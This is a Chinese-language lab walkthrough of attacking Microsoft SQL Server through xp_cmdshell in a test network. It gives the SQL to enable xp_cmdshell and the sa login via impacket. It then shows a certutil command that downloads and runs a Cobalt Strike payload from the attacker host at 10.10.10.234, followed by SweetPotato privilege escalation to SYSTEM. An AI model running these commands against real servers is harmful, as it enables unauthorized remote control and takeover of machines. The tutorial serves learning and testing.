文章目录
-
-
- 一、简介
- 二、搭建环境
- 三、利用条件
-
- [1、查询 xp_cmdshell 是否开启,返回为1则证明存在](#1、查询 xp_cmdshell 是否开启,返回为1则证明存在)
- 2、判断权限是不是sa,回是1说明是sa
- 3、开启xp_cmdshell
- 4、关闭xp_cmdshell
- 四、获取数据库权限
- 五、提升为管理员权限
- 免责声明
-
一、简介
Sql server
也称Mssql Server
,扩展存储过程中xp_cmdshell
是一个开放接口,可以让SQLserver
调用cmd
命令。此存储过程在SQLserver2000
中默认开启,2005
本身及之后的版本默认禁止,所以想要使用该存储过程,就需要拥有SA账号相应权限,使用sp_configure
将其开启。
xp_cmdshell
可以让系统管理员以操作系统命令行解释器的方式执行给定的命令字符串,并以文本行方式返回任何输出,是一个功能非常强大的扩展"存贮过程"。那么"存储过程",其实质就是一个"集合",就是存储在Sql Server
中预先定义好的"SQL语句集合",说的更直白一些就是各种小脚本共同组成的集合体,我们称之为"存储过程"。
二、搭建环境
系统 | IP | 服务 |
---|---|---|
windows server2012 | 10.10.10.40 | SQL serve数据库 |
kali-linux | 10.10.10.234 | 攻击方-cobaltstrike |
data:image/s3,"s3://crabby-images/79658/79658da3d52f904d34eecb23e1b44e3717bc8d80" alt=""
data:image/s3,"s3://crabby-images/1c6e2/1c6e27285be077e32c845be41d64e07ef885ddc2" alt=""
三、利用条件
任何版本的Sql Server都可以对xp_cmdshell 进行利用;
SQL Server数据库没有被降权;
sa用户或其他具有dba权限的账户。
1、查询 xp_cmdshell 是否开启,返回为1则证明存在
select count(*) from master.dbo.sysobjects where xtype = 'x' and name ='xp_cmdshell';
data:image/s3,"s3://crabby-images/758dd/758dd9949e4eb69233ff425ab604723e7192c31d" alt=""
2、判断权限是不是sa,回是1说明是sa
data:image/s3,"s3://crabby-images/ec073/ec073013b6ab309c23846f1d77098ea489eda185" alt=""
3、开启xp_cmdshell
xp_cmdshell 开关。
【参数解析】
exec 显示或更改当前服务器的全局配置设置。
sp_configure 动态执行SQL语句的命令。
进行开启
exec sp_configure 'show advanced options', 1;reconfigure;
exec sp_configure 'xp_cmdshell',1;reconfigure;
data:image/s3,"s3://crabby-images/f81b5/f81b5c3ad5fedcbe7d651dad17941f42eec53ce1" alt=""
4、关闭xp_cmdshell
exec sp_configure 'show advanced options', 1;reconfigure;
exec sp_configure 'xp_cmdshell', 0;reconfigure;
data:image/s3,"s3://crabby-images/735a4/735a449bad9cdadc82305003fb2149200ad93ab0" alt=""
四、获取数据库权限
1、成功获取sqlserver,进行登陆
路径:~/Desktop/impack/impacket-master/examples
命令:python3 mssqlclient.py sa@10.10.10.40
data:image/s3,"s3://crabby-images/e78b0/e78b06a7de6d863b1675eb83d54679aa1742ed4a" alt=""
2、开启xp_cmdshell权限
exec xp_cmdshell whami
exec xp_cmdshell ipconfig
enable_xp_cmdshell
data:image/s3,"s3://crabby-images/b93e3/b93e3e55270b20bfcebee3edcfde301b73e1c083" alt=""
3、服务器端开启cobaltstrike,并且开启exe远程访问
python3 -m http.server 9999
data:image/s3,"s3://crabby-images/858aa/858aa834f4b5505f3c5f43014aee850c49e1e24d" alt=""
4、执行命令,进行上线
xp_cmdshell certutil -urlcache -split -f http://10.10.10.234:9999/123.exe c:/windows/temp/123.exe
xp_cmdshell c:/windows/temp/123.exe
data:image/s3,"s3://crabby-images/052f1/052f137954a77d7f7a048bf1ac3fbb0c444f9bf0" alt=""
5、成功获取数据库权限
data:image/s3,"s3://crabby-images/13a57/13a5743e7201110cbe42cf1e37a1d1077e31dfb5" alt=""
五、提升为管理员权限
1、选取插件SweetPotato(MS16-075)
data:image/s3,"s3://crabby-images/c654b/c654b6d43673e308710c5521333096cc128b49b4" alt=""
2、选取刚才上线的sqlserver用户权限
data:image/s3,"s3://crabby-images/18798/187985cbc184aef9c5390f7cf977fca65bbc4fa4" alt=""
3、此时成功变成system权限
data:image/s3,"s3://crabby-images/e7ecd/e7ecdce6ec48d1c2bd371c5eb6a31e985c86bc44" alt=""
data:image/s3,"s3://crabby-images/8dc26/8dc260c4b79b2508ce6c1c1be4d30cc9052679ff" alt=""
免责声明
本文档供学习,请使用者注意使用环境并遵守国家相关法律法规!由于使用不当造成的后果上传者概不负责!